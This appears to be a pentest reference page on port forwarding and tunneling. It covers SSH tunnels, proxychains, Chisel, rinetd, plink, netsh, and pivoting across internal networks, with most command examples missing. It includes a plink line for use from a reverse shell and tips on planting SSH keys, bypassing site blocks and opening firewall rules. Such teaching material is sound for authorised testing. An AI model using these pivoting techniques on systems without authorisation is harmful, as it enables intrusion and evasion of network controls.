Port Forwarding and Tunneling
Last updated
Was this helpful?
Last updated
Was this helpful?
In computer networking, port forwarding or port mapping is an application of network address translation that redirects a communication request from one address and port number combination to another.
Reverse SSH port forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side.
-L is a local tunnel (YOU --> CLIENT). If a site was blocked, you can forward the traffic to a server you own and view it. For example, if test was blocked at work, you can do the next command. Going to localhost:9000 on your machine, will load test traffic using your other server.
-R is a remote tunnel (YOU <-- CLIENT). You forward your traffic to the other server for others to view. Similar to the example above, but in reverse. Sometimes the ssh server is off and you need to ssh back to your attacking machine in order to forward a traffic port.
This is the coolest one because uses SOCKS4 proxy and redirects all traffic sent via proxy to the target machine, which would be similar like launching our scripts from the target machine.
First we need to configure proxychains.
Create the dynamic tunnel with the specified port.
After that all commands that begins with proxychains will be sent through the proxy.
If the host is not specified ssh creates a socks4 tunnel. So if there are no ssh service on the target machine we can also create a tunnel.
If it's not possible to setup a tty, because the target machine does not have python installed, we would not be able to put the password on the prompt. So instead of that we will use a pair of keys.
Remember to add the id_rsa.pub key on the authorized keys.
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. Available on Windows and Linux
Note: Download a Release
Start the Chisel server on your attacker machine specifying the port to use.
On the target machine, you need to start the Chisel client, specify the server IP and port, and specify the ports to tunneling.
rinetd is a port forwarding tool easily configurable and installable.
The rinetd configuration file is /etc/rinetd.conf that lists all forwarding rules.
Remember restart the service:
hts is a the httptunnel server which has an easily installation.
The use is similar a rinetd but the configuration is established by parameters.
Plink is a windows based command line port forwarding tool based on the PuTTY project. Same as SSH has local, remote and dynamic port forwarding.
Warning: May be in a Reverse Shell the command doen't works so you need to pipe to:
cmd.exe /c echo y | plink.exe -ssh .....
netsh utility is installed by default on every modern version of Windows.
By default, Windows will block our connections with the Firewall, being administrator we can easily add a rule to let the traffic pass.
Sometimes in Internal Penetration test we can find the following scenario, where we need to access to a network NET3.
Kali has access to NET1.
SRV1 has access to NET2.
SRV2 has access to NET3.
We can access to NET2 via creating a dynamic SSH Tunnel (SOCKS4) from a host on NET1 which have access to NET2 such as SRV1. SRV1 does not have access to NET3.
To access to NET3 we need to create a dynamic SSH Tunnel to SRV2, which we don't have access directly from Kali.
Create a Port forwarding From Kali to SRV1 redirecting the SSH port of SRV2 to a local port such as 9998.
And finally create the dynamic SSH tunnel to SRV2.
Final graph where we can see what we do with the tunnels.
To forward only one port we can do a double Local port forwarding.
Now port 9999 of the kali is the port 80 of SRV3.
